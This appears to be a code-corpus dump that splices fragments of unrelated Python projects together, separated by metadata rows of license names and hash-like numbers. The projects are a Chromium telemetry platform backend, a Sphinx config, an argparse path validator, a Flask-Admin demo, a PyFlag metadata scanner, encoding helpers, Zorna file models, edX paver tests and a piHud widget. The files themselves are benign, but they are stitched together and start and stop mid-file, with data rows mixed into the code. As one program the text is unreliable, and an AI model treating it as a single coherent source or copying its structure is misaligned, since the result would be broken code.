self.SetFullPerformanceModeEnabled(browser_options.full_performance_mode)
# TODO(slamm): Remove this call when replay browser_backend dependencies
# get moved to platform. https://crbug.com/423962
self._network_controller_backend.UpdateReplay(browser_backend)
def DidStartBrowser(self, browser, browser_backend):
assert browser not in self._running_browser_backends
self._running_browser_backends.add(browser_backend)
def WillCloseBrowser(self, browser, browser_backend):
# TODO(slamm): Move this call when replay's life cycle is no longer
# tied to the browser. https://crbug.com/424777
self._network_controller_backend.StopReplay()
is_last_browser = len(self._running_browser_backends) <= 1
if is_last_browser:
self.SetFullPerformanceModeEnabled(False)
self._running_browser_backends.discard(browser_backend)
@property
def wpr_http_device_port(self):
return self._network_controller_backend.wpr_http_device_port
@property
def wpr_https_device_port(self):
return self._network_controller_backend.wpr_https_device_port
def IsDisplayTracingSupported(self):
return False
def StartDisplayTracing(self):
"""Start gathering a trace with frame timestamps close to physical
display."""
raise NotImplementedError()
def StopDisplayTracing(self):
"""Stop gathering a trace with frame timestamps close to physical display.
    Returns raw tracing events that contain the timestamps of the physical
    display.
"""
raise NotImplementedError()
def SetFullPerformanceModeEnabled(self, enabled):
pass
def CanMonitorThermalThrottling(self):
return False
def IsThermallyThrottled(self):
raise NotImplementedError()
def HasBeenThermallyThrottled(self):
raise NotImplementedError()
def GetSystemCommitCharge(self):
raise NotImplementedError()
def GetSystemTotalPhysicalMemory(self):
raise NotImplementedError()
def GetCpuStats(self, pid):
return {}
def GetCpuTimestamp(self):
return {}
def PurgeUnpinnedMemory(self):
pass
def GetMemoryStats(self, pid):
return {}
def GetChildPids(self, pid):
raise NotImplementedError()
def GetCommandLine(self, pid):
raise NotImplementedError()
def GetDeviceTypeName(self):
raise NotImplementedError()
def GetArchName(self):
raise NotImplementedError()
def GetOSName(self):
raise NotImplementedError()
def GetOSVersionName(self):
raise NotImplementedError()
def CanFlushIndividualFilesFromSystemCache(self):
raise NotImplementedError()
def FlushEntireSystemCache(self):
raise NotImplementedError()
def FlushSystemCacheForDirectory(self, directory):
raise NotImplementedError()
def FlushDnsCache(self):
pass
def LaunchApplication(
self, application, parameters=None, elevate_privilege=False):
raise NotImplementedError()
def IsApplicationRunning(self, application):
raise NotImplementedError()
def CanLaunchApplication(self, application):
return False
def InstallApplication(self, application):
raise NotImplementedError()
def CanCaptureVideo(self):
return False
def StartVideoCapture(self, min_bitrate_mbps):
raise NotImplementedError()
@property
def is_video_capture_running(self):
return False
def StopVideoCapture(self):
raise NotImplementedError()
def CanMonitorPower(self):
return False
def CanMeasurePerApplicationPower(self):
return False
def StartMonitoringPower(self, browser):
raise NotImplementedError()
def StopMonitoringPower(self):
raise NotImplementedError()
def CanMonitorNetworkData(self):
return False
def GetNetworkData(self, browser):
raise NotImplementedError()
def ReadMsr(self, msr_number, start=0, length=64):
"""Read a CPU model-specific register (MSR).
Which MSRs are available depends on the CPU model.
On systems with multiple CPUs, this function may run on any CPU.
Args:
msr_number: The number of the register to read.
start: The least significant bit to read, zero-indexed.
(Said another way, the number of bits to right-shift the MSR value.)
length: The number of bits to read. MSRs are 64 bits, even on 32-bit CPUs.
"""
raise NotImplementedError()
@property
def wpr_ca_cert_path(self):
return None
def CanTakeScreenshot(self):
return False
def TakeScreenshot(self, file_path):
raise NotImplementedError
def IsCooperativeShutdownSupported(self):
"""Indicates whether CooperativelyShutdown, below, is supported.
It is not necessary to implement it on all platforms."""
return False
def CooperativelyShutdown(self, proc, app_name):
"""Cooperatively shut down the given process from subprocess.Popen.
Currently this is only implemented on Windows. See
crbug.com/424024 for background on why it was added.
Args:
proc: a process object returned from subprocess.Popen.
app_name: on Windows, is the prefix of the application's window
class name that should be searched for. This helps ensure
that only the application's windows are closed.
Returns True if it is believed the attempt succeeded.
"""
raise NotImplementedError()
def PathExists(self, path, timeout=None, retries=None):
"""Tests whether the given path exists on the target platform.
Args:
path: path in request.
timeout: timeout.
retries: num of retries.
Return:
Whether the path exists on the target platform.
"""
raise NotImplementedError()
| bsd-3-clause | -1,934,696,983,969,230,300 | 27.744898 | 80 | 0.732221 | false |
simone-campagna/shells-kitchen | docs/source/conf.py | 1 | 11364 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Shell's Kitchen documentation build configuration file, created by
# sphinx-quickstart on Mon Feb 22 09:09:41 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.napoleon',
'sphinx.ext.autosummary',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
]
napoleon_use_param = True
# Intersphinx python
intersphinx_mapping = {'python': ('https://docs.python.org/3.4', None)}
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'shells kitchen'
copyright = '2016, Simone Campagna'
author = 'Simone Campagna'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The full version, including alpha/beta/rc tags.
release = '0.10.1'
# The short X.Y version.
version = release.rsplit('.', 1)[0]
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# on_rtd is whether we are on readthedocs.org
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
try:
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
except ImportError:
pass
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'ShellsKitchendoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'ShellsKitchen.tex', 'Shell\'s Kitchen Documentation',
'Simone Campagna', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'shellskitchen', 'Shell\'s Kitchen Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'ShellsKitchen', 'Shell\'s Kitchen Documentation',
author, 'ShellsKitchen', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The basename for the epub file. It defaults to the project name.
#epub_basename = project
# The HTML theme for the epub output. Since the default themes are not
# optimized for small screen space, using the same theme for HTML and epub
# output is usually not wise. This defaults to 'epub', a theme designed to save
# visual space.
#epub_theme = 'epub'
# The language of the text. It defaults to the language option
# or 'en' if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
#epub_guide = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files that should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Choose between 'default' and 'includehidden'.
#epub_tocscope = 'default'
# Fix unsupported image types using the Pillow.
#epub_fix_images = False
# Scale large images.
#epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#epub_show_urls = 'inline'
# If false, no index is generated.
#epub_use_index = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
| apache-2.0 | -2,112,141,964,533,189,000 | 30.21978 | 79 | 0.702834 | false |
ksylvan/python-vipaccess | vipaccess/patharg.py | 1 | 2560 | # https://mail.python.org/pipermail/stdlib-sig/2015-July/000990.html
from argparse import ArgumentTypeError as err
import os
class PathType(object):
def __init__(self, exists=True, type='file', dash_ok=True):
'''exists:
True: a path that does exist
False: a path that does not exist, in a valid parent directory
None: don't care
type: file, dir, symlink, None, or a function returning True for valid paths
None: don't care
dash_ok: whether to allow "-" as stdin/stdout'''
assert exists in (True, False, None)
assert type in ('file','dir','symlink',None) or hasattr(type,'__call__')
self._exists = exists
self._type = type
self._dash_ok = dash_ok
def __call__(self, string):
if string=='-':
# the special argument "-" means sys.std{in,out}
if self._type == 'dir':
raise err('standard input/output (-) not allowed as directory path')
elif self._type == 'symlink':
raise err('standard input/output (-) not allowed as symlink path')
elif not self._dash_ok:
raise err('standard input/output (-) not allowed')
else:
e = os.path.exists(string)
if self._exists==True:
if not e:
raise err("path does not exist: '%s'" % string)
if self._type is None:
pass
elif self._type=='file':
if not os.path.isfile(string):
raise err("path is not a file: '%s'" % string)
elif self._type=='symlink':
                    if not os.path.islink(string):
raise err("path is not a symlink: '%s'" % string)
elif self._type=='dir':
if not os.path.isdir(string):
raise err("path is not a directory: '%s'" % string)
elif not self._type(string):
raise err("path not valid: '%s'" % string)
else:
if self._exists==False and e:
raise err("path exists: '%s'" % string)
p = os.path.dirname(os.path.normpath(string)) or '.'
if not os.path.isdir(p):
raise err("parent path is not a directory: '%s'" % p)
elif not os.path.exists(p):
raise err("parent directory does not exist: '%s'" % p)
return string
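# Illustrative usage, not part of the original module (argument names are hypothetical):
#
#   parser = argparse.ArgumentParser()
#   parser.add_argument('token_file', type=PathType(exists=True, type='file'))
#   parser.add_argument('out_dir', type=PathType(exists=False, type='dir', dash_ok=False))
#
# argparse reports the ArgumentTypeError raised via the `err` alias as a normal usage error.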
| apache-2.0 | 5,135,719,561,126,125,000 | 40.967213 | 87 | 0.501172 | false |
marty331/jakesclock | flask/lib/python2.7/site-packages/examples/forms/app.py | 2 | 7444 | import os
import os.path as op
from flask import Flask, url_for
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.event import listens_for
from jinja2 import Markup
from flask_admin import Admin, form
from flask_admin.form import rules
from flask_admin.contrib import sqla
# Create application
app = Flask(__name__, static_folder='files')
# Create a dummy secret key so we can use sessions
app.config['SECRET_KEY'] = '123456790'
# Create in-memory database
app.config['DATABASE_FILE'] = 'sample_db.sqlite'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + app.config['DATABASE_FILE']
app.config['SQLALCHEMY_ECHO'] = True
db = SQLAlchemy(app)
# Create directory for file fields to use
file_path = op.join(op.dirname(__file__), 'files')
try:
os.mkdir(file_path)
except OSError:
pass
# Create models
class File(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Unicode(64))
path = db.Column(db.Unicode(128))
def __unicode__(self):
return self.name
class Image(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Unicode(64))
path = db.Column(db.Unicode(128))
def __unicode__(self):
return self.name
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
first_name = db.Column(db.Unicode(64))
last_name = db.Column(db.Unicode(64))
email = db.Column(db.Unicode(128))
phone = db.Column(db.Unicode(32))
city = db.Column(db.Unicode(128))
country = db.Column(db.Unicode(128))
notes = db.Column(db.UnicodeText)
# Delete hooks for models, delete files if models are getting deleted
@listens_for(File, 'after_delete')
def del_file(mapper, connection, target):
if target.path:
try:
os.remove(op.join(file_path, target.path))
except OSError:
# Don't care if was not deleted because it does not exist
pass
@listens_for(Image, 'after_delete')
def del_image(mapper, connection, target):
if target.path:
# Delete image
try:
os.remove(op.join(file_path, target.path))
except OSError:
pass
# Delete thumbnail
try:
os.remove(op.join(file_path,
form.thumbgen_filename(target.path)))
except OSError:
pass
# Administrative views
class FileView(sqla.ModelView):
# Override form field to use Flask-Admin FileUploadField
form_overrides = {
'path': form.FileUploadField
}
# Pass additional parameters to 'path' to FileUploadField constructor
form_args = {
'path': {
'label': 'File',
'base_path': file_path,
'allow_overwrite': False
}
}
class ImageView(sqla.ModelView):
def _list_thumbnail(view, context, model, name):
if not model.path:
return ''
return Markup('<img src="%s">' % url_for('static',
filename=form.thumbgen_filename(model.path)))
column_formatters = {
'path': _list_thumbnail
}
# Alternative way to contribute field is to override it completely.
# In this case, Flask-Admin won't attempt to merge various parameters for the field.
form_extra_fields = {
'path': form.ImageUploadField('Image',
base_path=file_path,
thumbnail_size=(100, 100, True))
}
class UserView(sqla.ModelView):
"""
This class demonstrates the use of 'rules' for controlling the rendering of forms.
"""
form_create_rules = [
# Header and four fields. Email field will go above phone field.
rules.FieldSet(('first_name', 'last_name', 'email', 'phone'), 'Personal'),
# Separate header and few fields
rules.Header('Location'),
rules.Field('city'),
# String is resolved to form field, so there's no need to explicitly use `rules.Field`
'country',
# Show macro from Flask-Admin lib.html (it is included with 'lib' prefix)
rules.Container('rule_demo.wrap', rules.Field('notes'))
]
# Use same rule set for edit page
form_edit_rules = form_create_rules
create_template = 'rule_create.html'
edit_template = 'rule_edit.html'
# Flask views
@app.route('/')
def index():
return '<a href="/admin/">Click me to get to Admin!</a>'
# Create admin
admin = Admin(app, 'Example: Forms')
# Add views
admin.add_view(FileView(File, db.session))
admin.add_view(ImageView(Image, db.session))
admin.add_view(UserView(User, db.session, name='User'))
def build_sample_db():
"""
Populate a small db with some example entries.
"""
import random
import string
db.drop_all()
db.create_all()
first_names = [
'Harry', 'Amelia', 'Oliver', 'Jack', 'Isabella', 'Charlie','Sophie', 'Mia',
'Jacob', 'Thomas', 'Emily', 'Lily', 'Ava', 'Isla', 'Alfie', 'Olivia', 'Jessica',
'Riley', 'William', 'James', 'Geoffrey', 'Lisa', 'Benjamin', 'Stacey', 'Lucy'
]
last_names = [
'Brown', 'Smith', 'Patel', 'Jones', 'Williams', 'Johnson', 'Taylor', 'Thomas',
'Roberts', 'Khan', 'Lewis', 'Jackson', 'Clarke', 'James', 'Phillips', 'Wilson',
'Ali', 'Mason', 'Mitchell', 'Rose', 'Davis', 'Davies', 'Rodriguez', 'Cox', 'Alexander'
]
locations = [
("Shanghai", "China"),
("Istanbul", "Turkey"),
("Karachi", "Pakistan"),
("Mumbai", "India"),
("Moscow", "Russia"),
("Sao Paulo", "Brazil"),
("Beijing", "China"),
("Tianjin", "China"),
("Guangzhou", "China"),
("Delhi", "India"),
("Seoul", "South Korea"),
("Shenzhen", "China"),
("Jakarta", "Indonesia"),
("Tokyo", "Japan"),
("Mexico City", "Mexico"),
("Kinshasa", "Democratic Republic of the Congo"),
("Bangalore", "India"),
("New York City", "United States"),
("London", "United Kingdom"),
("Bangkok", "Thailand"),
("Tehran", "Iran"),
("Dongguan", "China"),
("Lagos", "Nigeria"),
("Lima", "Peru"),
("Ho Chi Minh City", "Vietnam"),
]
for i in range(len(first_names)):
user = User()
user.first_name = first_names[i]
user.last_name = last_names[i]
user.email = user.first_name.lower() + "@example.com"
tmp = ''.join(random.choice(string.digits) for i in range(10))
user.phone = "(" + tmp[0:3] + ") " + tmp[3:6] + " " + tmp[6::]
user.city = locations[i][0]
user.country = locations[i][1]
db.session.add(user)
images = ["Buffalo", "Elephant", "Leopard", "Lion", "Rhino"]
for name in images:
image = Image()
image.name = name
image.path = name.lower() + ".jpg"
db.session.add(image)
for i in [1, 2, 3]:
file = File()
file.name = "Example " + str(i)
file.path = "example_" + str(i) + ".pdf"
db.session.add(file)
db.session.commit()
return
if __name__ == '__main__':
# Build a sample db on the fly, if one does not exist yet.
app_dir = op.realpath(os.path.dirname(__file__))
database_path = op.join(app_dir, app.config['DATABASE_FILE'])
if not os.path.exists(database_path):
build_sample_db()
# Start app
app.run(debug=True)
| gpl-2.0 | -308,090,450,717,494,340 | 28.422925 | 94 | 0.582214 | false |
arkem/pyflag | src/plugins/DiskForensics/FileHandlers/Extractor.py | 2 | 2151 | """ This is a scanner which utilises libextractor to collect metadata
about some files.
"""
from pyflag.Scanner import *
import pyflag.Reports as Reports
from pyflag.ColumnTypes import StringType, TimestampType, InodeIDType
active = False
try:
import extractor
E = extractor.Extractor()
class ExtractorScan(GenScanFactory):
""" A Scanner to collect metadata about files """
order = 90
default = True
depends = 'TypeScan'
class Scan(StoreAndScanType):
types = (
                # This forces all images to be cached; do we really want this?
# 'image/.*',
'application/msword',
'application/x-executable'
)
def external_process(self,fd):
dbh=DB.DBO(self.case)
meta=E.extractFromFile(fd.name)
dbh = DB.DBO(self.case)
for pair in meta:
dbh.insert("xattr",
inode_id = self.fd.lookup_id(),
property = pair[0],
value = pair[1],
)
class BrowseMetadata(Reports.report):
"""
Browse Metadata
---------------
PyFlag can use the libextractor scanner to gather many
interesting facts about files being scanned. The specifics of
        this metadata depend on libextractor, but generally metadata
reveals intimate details relating to the files - such as
authors, creation times etc.
This report simply presents the data in a tabular format so it
        can be searched easily.
"""
name = "Browse Metadata"
family = "Disk Forensics"
def display(self, query, result):
result.table(
elements = [ InodeIDType(case=query['case']),
StringType('Property','property'),
StringType('Value','value')],
table = 'xattr',
case = query['case'],
)
except ImportError:
pass
| gpl-2.0 | -7,346,227,057,464,774,000 | 30.173913 | 70 | 0.527662 | false |
dvliman/jaikuengine | vendor/cleanliness/encoding.py | 9 | 3595 | import datetime
import urllib
import types
def smart_unicode(s, encoding='utf-8', strings_only=False, errors='strict'):
"""
Returns a unicode object representing 's'. Treats bytestrings using the
'encoding' codec.
If strings_only is True, don't convert (some) non-string-like objects.
"""
return force_unicode(s, encoding, strings_only, errors)
def force_unicode(s, encoding='utf-8', strings_only=False, errors='strict'):
"""
Similar to smart_unicode, except that lazy instances are resolved to
strings, rather than kept as lazy objects.
If strings_only is True, don't convert (some) non-string-like objects.
"""
if strings_only and isinstance(s,
(types.NoneType, int, long,
datetime.datetime, datetime.date,
datetime.time, float)):
return s
try:
if not isinstance(s, basestring,):
if hasattr(s, '__unicode__'):
s = unicode(s)
else:
try:
s = unicode(str(s), encoding, errors)
except UnicodeEncodeError:
if not isinstance(s, Exception):
raise
# If we get to here, the caller has passed in an Exception
# subclass populated with non-ASCII data without special
# handling to display as a string. We need to handle this
# without raising a further exception. We do an
# approximation to what the Exception's standard str()
# output should be.
s = ' '.join([force_unicode(arg, encoding, strings_only,
errors)
for arg in s])
elif not isinstance(s, unicode):
# Note: We use .decode() here, instead of unicode(s, encoding,
# errors), so that if s is a SafeString, it ends up being a
# SafeUnicode at the end.
s = s.decode(encoding, errors)
except UnicodeDecodeError, e:
raise
return s
def smart_str(s, encoding='utf-8', strings_only=False, errors='strict'):
"""
Returns a bytestring version of 's', encoded as specified in 'encoding'.
If strings_only is True, don't convert (some) non-string-like objects.
"""
if strings_only and isinstance(s, (types.NoneType, int)):
return s
elif not isinstance(s, basestring):
try:
return str(s)
except UnicodeEncodeError:
if isinstance(s, Exception):
# An Exception subclass containing non-ASCII data that doesn't
# know how to print itself properly. We shouldn't raise a
# further exception.
return ' '.join([smart_str(arg, encoding, strings_only,
errors) for arg in s])
return unicode(s).encode(encoding, errors)
elif isinstance(s, unicode):
return s.encode(encoding, errors)
elif s and encoding != 'utf-8':
return s.decode('utf-8', errors).encode(encoding, errors)
else:
return s
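# Illustrative round trips under the UTF-8 defaults (not part of the original module):
#   smart_unicode('caf\xc3\xa9') -> u'caf\xe9'
#   smart_str(u'caf\xe9') -> 'caf\xc3\xa9'
# force_unicode() additionally copes with Exception instances carrying non-ASCII
# arguments, as handled in the branches above.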
def iri_to_uri(iri):
"""
Convert an Internationalized Resource Identifier (IRI) portion to a URI
portion that is suitable for inclusion in a URL.
This is the algorithm from section 3.1 of RFC 3987. However, since we are
assuming input is either UTF-8 or unicode already, we can simplify things a
little from the full method.
Returns an ASCII string containing the encoded result.
"""
# The list of safe characters here is constructed from the printable ASCII
# characters that are not explicitly excluded by the list at the end of
# section 3.1 of RFC 3987.
if iri is None:
return iri
return urllib.quote(smart_str(iri), safe='/#%[]=:;$&()+,!?*')
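# Illustrative example (hypothetical path, UTF-8 input assumed):
#   iri_to_uri(u'/people/caf\xe9?tag=\xe9') -> '/people/caf%C3%A9?tag=%C3%A9'
# Characters in the safe list above (e.g. '/', '?', '=') pass through unchanged;
# the remaining bytes of the UTF-8 encoding are percent-escaped.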
| apache-2.0 | 7,356,977,162,781,316,000 | 36.061856 | 77 | 0.636161 | false |
zorna/zorna | zorna/fileman/models.py | 1 | 3426 | import os
from django.conf import settings
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ugettext_noop
from django.core.urlresolvers import reverse
from mptt.models import MPTTModel
from tagging.fields import TagField
from tagging.utils import parse_tag_input
from tagging.models import Tag
from zorna.models import ZornaEntity
from zorna.fileman.managers import ZornaFolderManager
from zorna.utilit import get_upload_library
FOLDER_NOTIFICATIONS = (
(0, _(u'No email notification')),
(1, _(u'Send email notification')),
(2, _(u'Let the author decide')),
)
class ZornaFolder(MPTTModel, ZornaEntity):
parent = models.ForeignKey(
'self', null=True, blank=True, related_name='children')
name = models.CharField(_('name'), max_length=255)
slug = models.SlugField(_('slug'), max_length=255, null=True, blank=True)
inherit_permissions = models.BooleanField(_(u'Inherit permissions'))
email_notification = models.IntegerField(max_length=1, choices=FOLDER_NOTIFICATIONS, default=0, help_text=_(
u'Users will receive email notification when a file is uploaded or updated'))
objects = ZornaFolderManager()
class Meta:
verbose_name = _('folder')
verbose_name_plural = _('folders')
ordering = ['tree_id', 'lft']
db_table = settings.TABLE_PREFIX + "folders"
def __unicode__(self):
return self.name
def get_complete_slug(self):
url = u''
for ancestor in self.get_ancestors(ascending=True):
url = ancestor.slug + u'/' + url
return url
def get_acl_permissions():
return {
'reader': ugettext_noop(u'Who can browse this folder'),
'writer': ugettext_noop(u'Who can upload files to this folder'),
'manager': ugettext_noop(u'Who can manage this folder'),
}
get_acl_permissions = staticmethod(get_acl_permissions)
class ZornaFile(ZornaEntity):
description = models.CharField(max_length=255)
folder = models.CharField(_(
'root_folder'), max_length=255, default='', editable=False)
tags = TagField()
class Meta:
verbose_name = _('file')
db_table = settings.TABLE_PREFIX + "files"
def __unicode__(self):
return _(u'file %s') % self.description
def delete(self):
# Deleting all asociated tags.
Tag.objects.update_tags(self, None)
super(ZornaFile, self).delete()
def get_tag_list(self):
return parse_tag_input(self.tags)
def get_file_info(self):
root_path = get_upload_library()
info = {}
fullpath = u"%s/%s" % (root_path, self.folder)
for dirName, subdirList, fileList in os.walk(fullpath):
for file_name in fileList:
tab = file_name.split(',')
if len(tab) > 1 and tab[0].isdigit():
pk, filename = tab[0], ','.join(tab[1:])
if int(pk) == self.pk:
info['filename'] = filename
url_component = dirName[len(
root_path) + 1:].replace('\\', '/')
info['url'] = reverse('get_file') + '?file=' + url_component + '/%s,%s' % (self.pk, filename)
info['path'] = url_component
return info
return info
| bsd-3-clause | -1,226,782,338,633,117,200 | 34.6875 | 117 | 0.607998 | false |
kmoocdev2/edx-platform | pavelib/paver_tests/test_utils.py | 20 | 1574 | """
Tests for pavelib/utils/test/utils
"""
import unittest
from mock import patch
from pavelib.utils.envs import Env
from pavelib.utils.test.utils import MINIMUM_FIREFOX_VERSION, check_firefox_version
@unittest.skipIf(Env.USING_DOCKER, 'Firefox version check works differently under Docker Devstack')
class TestUtils(unittest.TestCase):
"""
Test utils.py under pavelib/utils/test
"""
@patch('subprocess.check_output')
def test_firefox_version_ok(self, _mock_subprocesss):
test_version = MINIMUM_FIREFOX_VERSION
_mock_subprocesss.return_value = "Mozilla Firefox {version}".format(
version=str(test_version)
)
# No exception should be raised
check_firefox_version()
@patch('subprocess.check_output')
def test_firefox_version_below_expected(self, _mock_subprocesss):
test_version = MINIMUM_FIREFOX_VERSION - 1
_mock_subprocesss.return_value = "Mozilla Firefox {version}".format(
version=test_version
)
with self.assertRaises(Exception):
check_firefox_version()
@patch('subprocess.check_output')
def test_firefox_version_not_detected(self, _mock_subprocesss):
_mock_subprocesss.return_value = "Mozilla Firefox"
with self.assertRaises(Exception):
check_firefox_version()
@patch('subprocess.check_output')
def test_firefox_version_bad(self, _mock_subprocesss):
_mock_subprocesss.return_value = "garbage"
with self.assertRaises(Exception):
check_firefox_version()
| agpl-3.0 | 7,533,373,007,488,369,000 | 32.489362 | 99 | 0.679797 | false |
brendanwhitfield/piHud | pihud/Widget.py | 2 | 2727 |
import obd
from widgets import widgets
from PyQt4 import QtCore, QtGui
class Widget(QtGui.QWidget):
def __init__(self, parent, config):
super(Widget, self).__init__(parent)
self.config = config
# temporary coloring until display widgets get implemented
# self.setAutoFillBackground(True)
# palette = self.palette()
# palette.setColor(self.backgroundRole(), QtGui.QColor(255, 255, 255, 50))
# self.setPalette(palette)
# make the context menu
self.menu = QtGui.QMenu()
self.menu.addAction(self.config["sensor"]).setDisabled(True)
subMenu = self.menu.addMenu("Widget Type")
for w in widgets:
a = subMenu.addAction(w)
a.setData(widgets[w])
self.menu.addAction("Delete Widget", self.delete)
# instantiate the requested graphics object
self.graphics = widgets[config["type"]](self, config)
self.move(self.position())
self.show()
def sizeHint(self):
if (self.config['w'] is not None) and \
(self.config['h'] is not None):
size = QtCore.QSize(self.config['w'], self.config['h'])
self.graphics.setFixedSize(size)
return size
else:
